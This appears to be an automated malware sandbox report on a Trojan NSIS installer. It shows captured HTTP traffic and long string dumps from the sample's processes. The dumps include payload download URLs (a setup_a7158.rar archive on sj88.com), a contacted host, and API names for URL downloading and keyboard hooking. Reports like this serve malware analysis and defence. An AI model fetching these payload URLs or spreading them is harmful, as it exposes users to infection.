Last-Modified: Thu, 14 Nov 2013 11:00:56 GMT
Connection: keep-alive
Accept-Ranges: bytes
.PNG........IHDR.......J.......D.....tEXtSoftware.Adobe ImageReadyq.e<...$iTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c061 64.140949, 2010/12/07-10:57:01 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS5.1 Macintosh" xmpMM:InstanceID="xmp.iid:CEC0416D02FB11E388CB8B2E3040A42A" xmpMM:DocumentID="xmp.did:CEC0416E02FB11E388CB8B2E3040A42A"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:CEC0416B02FB11E388CB8B2E3040A42A" stRef:documentID="xmp.did:CEC0416C02FB11E388CB8B2E3040A42A"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>.Z....%<IDATx..].....&.(..."...ky......f...7..........W@%.`..@A.*(...P..;K......E|..;g.....?[....>.<.............i......h-....@_~.. _&.2%...<..........k......w.d./.....U 8..r./=|..9.{.P .IT.r.J.b].|...3|....../7....]1..=?..M]Y.f.....n...7l.:w......Vk?.gkk 8.z..........ps...^p........P-....Z..._.6l.....KWWW.jjj...........Q..P.~.|..Y..O......... .}...GI...3k..#......KS.....n..r.rm..../.....'JUUU..aIT....V......4...]P.......M.....Y..xju6...2...|.o3......?...>X\..V[[......}(//........o.CEM...f.N..Z.....O. ..7hU.qC=p&/........@.|'gA.1.>.$....{@t..P...um..A..8..].v.;..D.b.]..ss.
<<
<<< skipped >>>
GET /imgn/123ie/setting_icon.gif HTTP/1.1
Accept: */*
Referer: hXXp://123.sogou.com/?22014
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: p6.123.sogoucdn.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.4.1
Date: Tue, 13 May 2014 04:49:23 GMT
Content-Type: image/gif
Content-Length: 76
Last-Modified: Wed, 25 Jul 2012 09:14:49 GMT
Connection: keep-alive
Expires: Thu, 12 Jun 2014 04:49:23 GMT
Cache-Control: max-age=2592000
Accept-Ranges: bytes
GIF89a.............#.....!.......,.............".8....=h%v..n!.....y.h.....;HTTP/1.1 200 OK..Server: nginx/1.4.1..Date: Tue, 13 May 2014 04:49:23 GMT..Content-Type: image/gif..Content-Length: 76..Last-Modified: Wed, 25 Jul 2012 09:14:49 GMT..Connection: keep-alive..Expires: Thu, 12 Jun 2014 04:49:23 GMT..Cache-Control: max-age=2592000..Accept-Ranges: bytes..GIF89a.............#.....!.......,.............".8....=h%v..n!.....y.h.....;..
Map
The Trojan connects to the servers at the folowing location(s):
Strings from Dumps
%original file name%.exe_204:
.text
.text
`.rdata
`.rdata
@.data
@.data
.ndata
.ndata
.rsrc
.rsrc
uDSSh
uDSSh
.DEFAULT\Control Panel\International
.DEFAULT\Control Panel\International
Software\Microsoft\Windows\CurrentVersion
Software\Microsoft\Windows\CurrentVersion
GetWindowsDirectoryA
GetWindowsDirectoryA
KERNEL32.dll
KERNEL32.dll
ExitWindowsEx
ExitWindowsEx
USER32.dll
USER32.dll
GDI32.dll
GDI32.dll
SHFileOperationA
SHFileOperationA
ShellExecuteA
ShellExecuteA
SHELL32.dll
SHELL32.dll
RegEnumKeyA
RegEnumKeyA
RegCreateKeyExA
RegCreateKeyExA
RegCloseKey
RegCloseKey
RegDeleteKeyA
RegDeleteKeyA
RegOpenKeyExA
RegOpenKeyExA
ADVAPI32.dll
ADVAPI32.dll
COMCTL32.dll
COMCTL32.dll
ole32.dll
ole32.dll
VERSION.dll
VERSION.dll
verifying installer: %d%%
verifying installer: %d%%
http://nsis.sf.net/NSIS_Error
http://nsis.sf.net/NSIS_Error
... %d%%
... %d%%
~nsu.tmp
~nsu.tmp
%u.%u%s%s
%u.%u%s%s
RegDeleteKeyExA
RegDeleteKeyExA
%s=%s
%s=%s
*?|<>/":
*?|<>/":
\LOCALS~1\Temp\nsu2.tmp\NSISdl.dll
\LOCALS~1\Temp\nsu2.tmp\NSISdl.dll
r.png
r.png
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsu2.tmp\NSISdl.dll
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsu2.tmp\NSISdl.dll
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsu2.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsu2.tmp
open.ini
open.ini
tEXtXML:com.adobe.xmp
tEXtXML:com.adobe.xmp
<rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"></rdf:RDF>
<rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"></rdf:RDF>
xmlns:xap="http://ns.adobe.com/xap/1.0/">
xmlns:xap="http://ns.adobe.com/xap/1.0/">
xmlns:dc="http://purl.org/dc/elements/1.1/">
xmlns:dc="http://purl.org/dc/elements/1.1/">
Undo=toolbar\16_undo.png
Undo=toolbar\16_undo.png
Undo.Hover=toolbar\16_undo2.png
Undo.Hover=toolbar\16_undo2.png
Undo.DrawBackground=1
Undo.DrawBackground=1
Favorites=toolbar\16_favorites.png
Favorites=toolbar\16_favorites.png
Favorites.Hover=toolbar\16_favorites2.png
Favorites.Hover=toolbar\16_favorites2.png
Favorites.DrawBackground=1
Favorites.DrawBackground=1
Feed.DrawBackground=1
Feed.DrawBackground=1
History=toolbar\16_history.png
History=toolbar\16_history.png
History.Hover=toolbar\16_history2.png
History.Hover=toolbar\16_history2.png
History.DrawBackground=1
History.DrawBackground=1
Layout.DrawBackground=1
Layout.DrawBackground=1
FontSize.DrawBackground=1
FontSize.DrawBackground=1
Encoding.DrawBackground=1
Encoding.DrawBackground=1
Zoom=toolbar\16_page_zoom.png
Zoom=toolbar\16_page_zoom.png
Zoom.Hover=toolbar\16_page_zoom2.png
Zoom.Hover=toolbar\16_page_zoom2.png
Zoom.DrawBackground=1
Zoom.DrawBackground=1
Proxy.DrawBackground=1
Proxy.DrawBackground=1
Tools.DrawBackground=1
Tools.DrawBackground=1
Plugins.DrawBackground=1
Plugins.DrawBackground=1
Security.DrawBackground=1
Security.DrawBackground=1
PageContent.DrawBackground=1
PageContent.DrawBackground=1
Edit=toolbar\16_edit.png
Edit=toolbar\16_edit.png
Edit.DrawBackground=1
Edit.DrawBackground=1
Save.DrawBackground=1
Save.DrawBackground=1
Options.DrawBackground=1
Options.DrawBackground=1
FormFiller.DrawBackground=1
FormFiller.DrawBackground=1
Screenshot.DrawBackground=1
Screenshot.DrawBackground=1
Page=misc\16_page.png
Page=misc\16_page.png
AddressBar=misc\16_page.png
AddressBar=misc\16_page.png
DefaultTabIcon=misc\16_page.png
DefaultTabIcon=misc\16_page.png
Search=toolbar\16_search.png
Search=toolbar\16_search.png
SearchBar=toolbar\16_search.png
SearchBar=toolbar\16_search.png
FolderOpen=misc\16_folder_open.png
FolderOpen=misc\16_folder_open.png
FolderClose=misc\16_folder_closed.png
FolderClose=misc\16_folder_closed.png
FolderClose.hover=misc\16_folder_open.png
FolderClose.hover=misc\16_folder_open.png
WebsiteInfo=misc\16_website_info.png
WebsiteInfo=misc\16_website_info.png
Go=misc\24_go.png
Go=misc\24_go.png
Go.Hover=misc\24_go2.png
Go.Hover=misc\24_go2.png
AdHunter=misc\16_ad_hunter.png
AdHunter=misc\16_ad_hunter.png
_Add=shared\16_new.png
_Add=shared\16_new.png
_Edit=shared\16_edit.png
_Edit=shared\16_edit.png
_Search=toolbar\16_search.png
_Search=toolbar\16_search.png
Caption=control\caption.ico
Caption=control\caption.ico
OpenInNew=misc\16_open_in_new.png
OpenInNew=misc\16_open_in_new.png
ForceTabInBK=misc\16_open_in_bg.png
ForceTabInBK=misc\16_open_in_bg.png
Caption.Text=#555555
Caption.Text=#555555
Status.Address.Text=#555555
Status.Address.Text=#555555
Toolbar.Normal.Text=#4F7639
Toolbar.Normal.Text=#4F7639
Toolbar.Disable.Text=#999999
Toolbar.Disable.Text=#999999
Toolbar.Gripper.Style=Dashed
Toolbar.Gripper.Style=Dashed
Toolbar.Gripper.Width=2
Toolbar.Gripper.Width=2
Toolbar.Gripper.Gap=2
Toolbar.Gripper.Gap=2
Toolbar.Gripper.Percent=90
Toolbar.Gripper.Percent=90
Toolbar.Gripper.Color=#6281aa
Toolbar.Gripper.Color=#6281aa
Toolbar.Gripper.ShadowColor=#f8fafd
Toolbar.Gripper.ShadowColor=#f8fafd
Toolbar.Separator.Style=Solid
Toolbar.Separator.Style=Solid
Toolbar.Separator.Width=1
Toolbar.Separator.Width=1
Toolbar.Separator.Percent=90
Toolbar.Separator.Percent=90
Toolbar.Separator.Color=#6281aa
Toolbar.Separator.Color=#6281aa
Toolbar.Separator.ShadowColor=#f8fafd
Toolbar.Separator.ShadowColor=#f8fafd
Toolbar.Hover.Text=#000066
Toolbar.Hover.Text=#000066
Toolbar.Hover.Border=#7CA5FA
Toolbar.Hover.Border=#7CA5FA
Toolbar.Hover.Start=#FFFFFF
Toolbar.Hover.Start=#FFFFFF
Toolbar.Hover.End=#C6D8FD
Toolbar.Hover.End=#C6D8FD
Toolbar.Checked.Text=#000066
Toolbar.Checked.Text=#000066
Toolbar.Checked.Border=#7CA5FA
Toolbar.Checked.Border=#7CA5FA
Toolbar.Checked.Start=#E7EEFE
Toolbar.Checked.Start=#E7EEFE
Toolbar.Checked.End=#FFFFFF
Toolbar.Checked.End=#FFFFFF
Toolbar.Pressed.Text=#003399
Toolbar.Pressed.Text=#003399
Toolbar.Pressed.Border=#7CA5FA // Not Impletemented
Toolbar.Pressed.Border=#7CA5FA // Not Impletemented
Toolbar.Pressed.Start=#E7EEFE
Toolbar.Pressed.Start=#E7EEFE
Toolbar.Pressed.End=#FFFFFF
Toolbar.Pressed.End=#FFFFFF
Menu.Normal.Text=#444444
Menu.Normal.Text=#444444
Menu.Disable.Text=#999999
Menu.Disable.Text=#999999
Menu.Border=#77a861
Menu.Border=#77a861
Menu.Separator.Style=Solid
Menu.Separator.Style=Solid
Menu.Separator.Width=2
Menu.Separator.Width=2
Menu.Separator.Percent=90
Menu.Separator.Percent=90
Menu.Separator.Color=#77A861
Menu.Separator.Color=#77A861
Menu.Separator.ShadowColor=#f8fafd
Menu.Separator.ShadowColor=#f8fafd
Menu.Hover.Text=#000066
Menu.Hover.Text=#000066
Menu.Hover.Border=#7CA5FA
Menu.Hover.Border=#7CA5FA
Menu.Hover.Start=#FFFFFF
Menu.Hover.Start=#FFFFFF
Menu.Hover.End=#C6D8FD
Menu.Hover.End=#C6D8FD
Menu.Checked.Text=#000066
Menu.Checked.Text=#000066
Menu.Checked.Border=#7CA5FA
Menu.Checked.Border=#7CA5FA
Menu.Checked.Start=#E7EEFE
Menu.Checked.Start=#E7EEFE
Menu.Checked.End=#FFFFFF
Menu.Checked.End=#FFFFFF
Menu.LabelBackground.Start=#ffffff
Menu.LabelBackground.Start=#ffffff
Menu.LabelBackground.End=#000000
Menu.LabelBackground.End=#000000
Tab.Normal.Text=#4F7639
Tab.Normal.Text=#4F7639
Tab.Hover.Text=#4F7639
Tab.Hover.Text=#4F7639
Tab.Active.Text=#4F7639
Tab.Active.Text=#4F7639
ComboBox.Text=#387B2F
ComboBox.Text=#387B2F
//MainPanel.Style=GFill
//MainPanel.Style=GFill
//MainPanel.Fill.ColorStart=#F6F9FD
//MainPanel.Fill.ColorStart=#F6F9FD
//MainPanel.Fill.ColorEnd=#D5E3F7
//MainPanel.Fill.ColorEnd=#D5E3F7
//MainPanel.Fill.Angle=90
//MainPanel.Fill.Angle=90
MainPanel.Style=3Image
MainPanel.Style=3Image
MainPanel.Image=control\title_bg.png
MainPanel.Image=control\title_bg.png
MainPanel.Image.StartOffset=0
MainPanel.Image.StartOffset=0
MainPanel.Image.EndOffset=0
MainPanel.Image.EndOffset=0
MainPanel.Image.Stretch=0
MainPanel.Image.Stretch=0
MenuBar.Style=Transparent
MenuBar.Style=Transparent
Menu.Style=GFill
Menu.Style=GFill
Menu.Fill.ColorStart=#f6f9fd
Menu.Fill.ColorStart=#f6f9fd
Menu.Fill.ColorEnd=#E0F0DC
Menu.Fill.ColorEnd=#E0F0DC
Menu.Fill.Angle=90
Menu.Fill.Angle=90
MenuStrip.Style=Transparent
MenuStrip.Style=Transparent
ToolBar.Style=Transparent
ToolBar.Style=Transparent
WebBar.Style=GFill
WebBar.Style=GFill
WebBar.Fill.ColorStart=#7b7153
WebBar.Fill.ColorStart=#7b7153
WebBar.Fill.ColorEnd=#9b998f
WebBar.Fill.ColorEnd=#9b998f
WebBar.Fill.Angle=90
WebBar.Fill.Angle=90
FloatBar.Style=GFill
FloatBar.Style=GFill
FloatBar.Fill.ColorStart=#EAF2F9
FloatBar.Fill.ColorStart=#EAF2F9
FloatBar.Fill.ColorEnd=#D5E3F7
FloatBar.Fill.ColorEnd=#D5E3F7
FloatBar.Fill.Angle=90
FloatBar.Fill.Angle=90
StatusBar.Style=GFill
StatusBar.Style=GFill
StatusBar.Fill.ColorStart=#F7F6F5
StatusBar.Fill.ColorStart=#F7F6F5
StatusBar.Fill.ColorEnd=#D5E3F7
StatusBar.Fill.ColorEnd=#D5E3F7
StatusBar.Fill.Angle=90
StatusBar.Fill.Angle=90
StatusBar.Style=Image
StatusBar.Style=Image
StatusBar.Image=control\status_bar_bg.png
StatusBar.Image=control\status_bar_bg.png
StatusBar.Image.Stretch=1
StatusBar.Image.Stretch=1
FindInPageBar.Style=GFill
FindInPageBar.Style=GFill
FindInPageBar.Fill.ColorStart=#F7F6F5
FindInPageBar.Fill.ColorStart=#F7F6F5
FindInPageBar.Fill.ColorEnd=#D5E3F7
FindInPageBar.Fill.ColorEnd=#D5E3F7
FindInPageBar.Fill.Angle=90
FindInPageBar.Fill.Angle=90
StatusBar.Style=3Image
StatusBar.Style=3Image
StatusBar.Image.StartOffset=15
StatusBar.Image.StartOffset=15
StatusBar.Image.EndOffset=15
StatusBar.Image.EndOffset=15
StatusBar.Image.Stretch=0
StatusBar.Image.Stretch=0
Button.Normal.Style=Transparent
Button.Normal.Style=Transparent
Button.Hover.Style=3Image
Button.Hover.Style=3Image
Button.Hover.Image=control\Button_Hover.png
Button.Hover.Image=control\Button_Hover.png
Button.Hover.Image.StartOffset=2
Button.Hover.Image.StartOffset=2
Button.Hover.Image.EndOffset=2
Button.Hover.Image.EndOffset=2
Button.Hover.Image.Stretch=1
Button.Hover.Image.Stretch=1
Button.Pressed.Style=3Image
Button.Pressed.Style=3Image
Button.Pressed.Image=control\Button_Pressed.png
Button.Pressed.Image=control\Button_Pressed.png
Button.Pressed.Image.StartOffset=2
Button.Pressed.Image.StartOffset=2
Button.Pressed.Image.EndOffset=2
Button.Pressed.Image.EndOffset=2
Button.Pressed.Image.Stretch=1
Button.Pressed.Image.Stretch=1
Button.Disabled.Style=3Image
Button.Disabled.Style=3Image
Button.Disabled.Image=control\Button_disabled.png
Button.Disabled.Image=control\Button_disabled.png
Button.Disabled.Image.StartOffset=2
Button.Disabled.Image.StartOffset=2
Button.Disabled.Image.EndOffset=2
Button.Disabled.Image.EndOffset=2
Button.Disabled.Image.Stretch=1
Button.Disabled.Image.Stretch=1
Button.Checked.Style=3Image
Button.Checked.Style=3Image
Button.Checked.Image=control\Button_Checked.png
Button.Checked.Image=control\Button_Checked.png
Button.Checked.Image.StartOffset=2
Button.Checked.Image.StartOffset=2
Button.Checked.Image.EndOffset=2
Button.Checked.Image.EndOffset=2
Button.Checked.Image.Stretch=1
Button.Checked.Image.Stretch=1
MenuItem.Hover.Style=3Image
MenuItem.Hover.Style=3Image
MenuItem.Hover.Image=control\MenuItem_Hover.png
MenuItem.Hover.Image=control\MenuItem_Hover.png
MenuItem.Hover.Image.StartOffset=15
MenuItem.Hover.Image.StartOffset=15
MenuItem.Hover.Image.EndOffset=15
MenuItem.Hover.Image.EndOffset=15
MenuItem.Hover.Image.Stretch=1
MenuItem.Hover.Image.Stretch=1
Tab.Normal.Image=control\tab_inactive.png
Tab.Normal.Image=control\tab_inactive.png
Tab.Normal.Image.StartOffset=8
Tab.Normal.Image.StartOffset=8
Tab.Normal.Image.EndOffset=8
Tab.Normal.Image.EndOffset=8
Tab.Normal.Image.Stretch=1
Tab.Normal.Image.Stretch=1
Tab.Normal.StartOut=2
Tab.Normal.StartOut=2
Tab.Normal.EndOut=0
Tab.Normal.EndOut=0
Tab.Normal.Padding=0 0 2 0
Tab.Normal.Padding=0 0 2 0
Tab.Hover.Image=control\tab_hover.png
Tab.Hover.Image=control\tab_hover.png
Tab.Hover.Image.StartOffset=8
Tab.Hover.Image.StartOffset=8
Tab.Hover.Image.EndOffset=8
Tab.Hover.Image.EndOffset=8
Tab.Hover.Image.Stretch=0
Tab.Hover.Image.Stretch=0
Tab.Unread.Image.StartOffset=8
Tab.Unread.Image.StartOffset=8
Tab.Unread.Image.EndOffset=8
Tab.Unread.Image.EndOffset=8
Tab.Unread.Image.Stretch=1
Tab.Unread.Image.Stretch=1
Tab.Active.Image=control\tab_active.png
Tab.Active.Image=control\tab_active.png
Tab.Active.Image.StartOffset=12
Tab.Active.Image.StartOffset=12
Tab.Active.Image.EndOffset=12
Tab.Active.Image.EndOffset=12
Tab.Active.Image.Stretch=0
Tab.Active.Image.Stretch=0
Tab.Active.StartOut=4
Tab.Active.StartOut=4
Tab.Active.EndOut=3
Tab.Active.EndOut=3
Tab.Active.Padding=0 0 2 0
Tab.Active.Padding=0 0 2 0
Background.Style=3Image
Background.Style=3Image
Background.Image=control\tab_bg.png
Background.Image=control\tab_bg.png
Background.Image.StartOffset=4
Background.Image.StartOffset=4
Background.Image.EndOffset=4
Background.Image.EndOffset=4
Background.Image.Stretch=1
Background.Image.Stretch=1
InactiveBackground.Style=3Image
InactiveBackground.Style=3Image
InactiveBackground.Image.StartOffset=4
InactiveBackground.Image.StartOffset=4
InactiveBackground.Image.EndOffset=4
InactiveBackground.Image.EndOffset=4
InactiveBackground.Image.Stretch=0
InactiveBackground.Image.Stretch=0
TabProgress.Style=Progress
TabProgress.Style=Progress
TabProgress.HideIcon=1
TabProgress.HideIcon=1
TabProgress.Offset=0 0
TabProgress.Offset=0 0
TabProgress.Image.FrameWidth=16
TabProgress.Image.FrameWidth=16
TabClose=control\tab_close.png
TabClose=control\tab_close.png
TabClose.Hover=control\tab_close_hover.png
TabClose.Hover=control\tab_close_hover.png
TabClose.Offset=-6 6
TabClose.Offset=-6 6
TabClose.ExtendSpace=20
TabClose.ExtendSpace=20
Tab.Normal.Image=control\sidebar_tab_inactive.png
Tab.Normal.Image=control\sidebar_tab_inactive.png
Tab.Normal.Image.StartOffset=10
Tab.Normal.Image.StartOffset=10
Tab.Normal.Image.EndOffset=4
Tab.Normal.Image.EndOffset=4
Tab.Normal.StartOut=0
Tab.Normal.StartOut=0
Tab.Normal.Padding=0 0 0 4
Tab.Normal.Padding=0 0 0 4
Tab.Active.Image=control\sidebar_tab_active.png
Tab.Active.Image=control\sidebar_tab_active.png
Tab.Active.Image.StartOffset=14
Tab.Active.Image.StartOffset=14
Tab.Active.Image.EndOffset=4
Tab.Active.Image.EndOffset=4
Tab.Active.StartOut=2
Tab.Active.StartOut=2
Tab.Active.EndOut=0
Tab.Active.EndOut=0
Tab.Active.Padding=0 0 0 0
Tab.Active.Padding=0 0 0 0
TitleBackground.Style=GFill
TitleBackground.Style=GFill
TitleBackground.Fill.ColorStart=#E4F2DD
TitleBackground.Fill.ColorStart=#E4F2DD
TitleBackground.Fill.ColorEnd=#E0ECD9
TitleBackground.Fill.ColorEnd=#E0ECD9
TitleBackground.Fill.Angle=90
TitleBackground.Fill.Angle=90
TabBackground.Style=GFill
TabBackground.Style=GFill
TabBackground.Fill.ColorStart=#CCDEC3
TabBackground.Fill.ColorStart=#CCDEC3
TabBackground.Fill.ColorEnd=#D4E3CC
TabBackground.Fill.ColorEnd=#D4E3CC
TabBackground.Fill.Angle=90
TabBackground.Fill.Angle=90
Background.Normal.Image=control\combo.png
Background.Normal.Image=control\combo.png
Background.Normal.Image.StartOffset=8
Background.Normal.Image.StartOffset=8
Background.Normal.Image.EndOffset=8
Background.Normal.Image.EndOffset=8
Background.Normal.Image.Stretch=0
Background.Normal.Image.Stretch=0
Background.Hover.Image=control\combo_hover.png
Background.Hover.Image=control\combo_hover.png
Background.Hover.Image.StartOffset=8
Background.Hover.Image.StartOffset=8
Background.Hover.Image.EndOffset=8
Background.Hover.Image.EndOffset=8
Background.Hover.Image.Stretch=0
Background.Hover.Image.Stretch=0
Thumb.Normal.Image=control\combo_dropdown.png
Thumb.Normal.Image=control\combo_dropdown.png
Thumb.Hover.Image=control\combo_dropdown_hover.png
Thumb.Hover.Image=control\combo_dropdown_hover.png
Foreground.Style=3Image
Foreground.Style=3Image
Foreground.Image=control\progress.png
Foreground.Image=control\progress.png
Foreground.Image.StartOffset=2
Foreground.Image.StartOffset=2
Foreground.Image.EndOffset=9
Foreground.Image.EndOffset=9
Foreground.Image.Stretch=1
Foreground.Image.Stretch=1
Background.Image.StartOffset=2
Background.Image.StartOffset=2
Background.Image.EndOffset=9
Background.Image.EndOffset=9
.tci4n
.tci4n
6-3}ij
6-3}ij
.vN {
.vN {
({,{<{*;
({,{<{*;
Z.pZ
Z.pZ
nsu2.tmp
nsu2.tmp
0C-29-8A-8B-37&md5=8eff8335308629faaae7eeb9444da07a&ini=open.ini&v=1.0.0.0
0C-29-8A-8B-37&md5=8eff8335308629faaae7eeb9444da07a&ini=open.ini&v=1.0.0.0
1.0.0.0
1.0.0.0
//www.sj88.com/hezi/jm/setup_a7158.rar
//www.sj88.com/hezi/jm/setup_a7158.rar
ns_61.rar
ns_61.rar
360.ini
360.ini
c:\%original file name%.exe
c:\%original file name%.exe
%Program Files%\greeou
%Program Files%\greeou
%original file name%.exe
%original file name%.exe
CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsp1.tmp
CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsp1.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
setup_a7158.exe
setup_a7158.exe
http://www.sj88.com/hezi/jm/setup_a7158.rar
http://www.sj88.com/hezi/jm/setup_a7158.rar
og.nk2
og.nk2
%dN@#
%dN@#
Fxx.tb
Fxx.tb
U0.Ylb
U0.Ylb
,.fd="
,.fd="
.pN7b
.pN7b
'SOE%s
'SOE%s
N,.fh
N,.fh
.QfAk
.QfAk
ÞDTDDDDDDDUUEUTDEUUEEEL
ÞDTDDDDDDDUUEUTDEUUEEEL
,<<<<,3#33#3"<"</pre><pre><3""2#2"<<
,<<<<,3#33#3"<"</pre><pre><3""2#2"<<
3<#33<#""""
3<#33<#""""
2#<<<333#""""**
2#<<<333#""""**
""*""""3"2344/
""*""""3"2344/
#""#""""
#""#""""
"""#2#"",
"""#2#"",
#"222"**
#"222"**
"""#""21
"""#""21
llfff.NB
llfff.NB
!%UUUN334Q
!%UUUN334Q
)))S%S*
)))S%S*
<?xml version="1.0" encoding="UTF-8" standalone="yes"?><assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity version="1.0.0.0" processorArchitecture="X86" name="Nullsoft.NSIS.exehead" type="win32" /><description>Nullsoft Install System v2.46</description><dependency><dependentAssembly><assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="X86" publicKeyToken="6595b64144ccf1df" language="*" /></dependentAssembly></dependency><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="asInvoker" uiAccess="false" /></requestedPrivileges></security></trustInfo><compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1"><application><supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}" /><supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}" /></application></compatibility></assembly>
<?xml version="1.0" encoding="UTF-8" standalone="yes"?><assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity version="1.0.0.0" processorArchitecture="X86" name="Nullsoft.NSIS.exehead" type="win32" /><description>Nullsoft Install System v2.46</description><dependency><dependentAssembly><assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="X86" publicKeyToken="6595b64144ccf1df" language="*" /></dependentAssembly></dependency><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="asInvoker" uiAccess="false" /></requestedPrivileges></security></trustInfo><compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1"><application><supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}" /><supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}" /></application></compatibility></assembly>
%Documents and Settings%\%current user%\Desktop\
%Documents and Settings%\%current user%\Desktop\
http://hh8.xjtj.org
http://hh8.xjtj.org
1.0.0.0
1.0.0.0
%original file name%.exe_204_rwx_10004000_00001000:
callback%d
callback%d
greendou.exe_772:
.text
.text
`.rdata
`.rdata
@.data
@.data
.rsrc
.rsrc
L$PSSSh,
L$PSSSh,
FtPh>
FtPh>
SSSSh
SSSSh
FtPh
FtPh
tcPS
tcPS
F4SSh
F4SSh
t%9X t ;
t%9X t ;
HSVWh<%U
HSVWh<%U
FTPj
FTPj
.FG;}
.FG;}
pdh.dll
pdh.dll
>1.2.10
>1.2.10
deflate 1.2.3 Copyright 1995-2005 Jean-loup Gailly
deflate 1.2.3 Copyright 1995-2005 Jean-loup Gailly
1.2.3
1.2.3
inflate 1.2.3 Copyright 1995-2005 Mark Adler
inflate 1.2.3 Copyright 1995-2005 Mark Adler
GetUrlCacheEntryInfoW
GetUrlCacheEntryInfoW
FindCloseUrlCache
FindCloseUrlCache
DeleteUrlCacheEntryW
DeleteUrlCacheEntryW
FindNextUrlCacheEntryW
FindNextUrlCacheEntryW
FindFirstUrlCacheEntryW
FindFirstUrlCacheEntryW
WININET.dll
WININET.dll
WS2_32.dll
WS2_32.dll
MFC42u.DLL
MFC42u.DLL
MSVCRT.dll
MSVCRT.dll
_wcmdln
_wcmdln
GetWindowsDirectoryW
GetWindowsDirectoryW
KERNEL32.dll
KERNEL32.dll
GetKeyState
GetKeyState
EnumChildWindows
EnumChildWindows
UnregisterHotKey
UnregisterHotKey
RegisterHotKey
RegisterHotKey
keybd_event
keybd_event
MapVirtualKeyW
MapVirtualKeyW
USER32.dll
USER32.dll
SetViewportOrgEx
SetViewportOrgEx
GDI32.dll
GDI32.dll
RegCloseKey
RegCloseKey
RegOpenKeyW
RegOpenKeyW
RegCreateKeyW
RegCreateKeyW
RegDeleteKeyW
RegDeleteKeyW
RegCreateKeyExW
RegCreateKeyExW
ADVAPI32.dll
ADVAPI32.dll
ShellExecuteW
ShellExecuteW
SHELL32.dll
SHELL32.dll
COMCTL32.dll
COMCTL32.dll
ole32.dll
ole32.dll
OLEAUT32.dll
OLEAUT32.dll
URLDownloadToFileW
URLDownloadToFileW
urlmon.dll
urlmon.dll
MSVCP60.dll
MSVCP60.dll
VERSION.dll
VERSION.dll
imagehlp.dll
imagehlp.dll
WINMM.dll
WINMM.dll
UnhookWindowsHookEx
UnhookWindowsHookEx
SetWindowsHookExW
SetWindowsHookExW
GetKeyNameTextW
GetKeyNameTextW
MapVirtualKeyExW
MapVirtualKeyExW
GetKeyboardLayout
GetKeyboardLayout
GetKeyboardState
GetKeyboardState
GetKeyboardLayoutList
GetKeyboardLayoutList
GetViewportOrgEx
GetViewportOrgEx
iie.exe
iie.exe
%y%m%d%H%M%S
%y%m%d%H%M%S
http://localhost
http://localhost
http://127.0.0.1
http://127.0.0.1
127.0.0.1
127.0.0.1
favicon.ico
favicon.ico
http://
http://
CWebBrowser2
CWebBrowser2
\update.ini
\update.ini
application/x-www-form-urlencoded
application/x-www-form-urlencoded
HTTPS://
HTTPS://
HTTP://
HTTP://
Ryeol HTTP Client Class
Ryeol HTTP Client Class
::WriteFile failed ("%s").
::WriteFile failed ("%s").
::GetFileSize failed ("%s").
::GetFileSize failed ("%s").
OpenFile (::CreateFile) failed ("%s").
OpenFile (::CreateFile) failed ("%s").
::HttpEndRequest failed.
::HttpEndRequest failed.
::HttpSendRequestEx failed.
::HttpSendRequestEx failed.
::HttpSendRequest failed.
::HttpSendRequest failed.
::HttpAddRequestHeaders failed.
::HttpAddRequestHeaders failed.
::HttpOpenRequest failed.
::HttpOpenRequest failed.
::HttpQueryInfo failed.
::HttpQueryInfo failed.
The file (%s) aleady exists.
The file (%s) aleady exists.
The encoded URL is not valid.
The encoded URL is not valid.
The port number is not valid.
The port number is not valid.
The requested URL is not a valid URL.
The requested URL is not a valid URL.
.?AVerrmsg_exceptionA@Ryeol@@
.?AVerrmsg_exceptionA@Ryeol@@
.?AVhttpclientexceptionA@Ryeol@@
.?AVhttpclientexceptionA@Ryeol@@
CHttpEncoderA::_AnsiCharToUtf8Char: szUtf8Char and szAnsiChar can not be NULL.
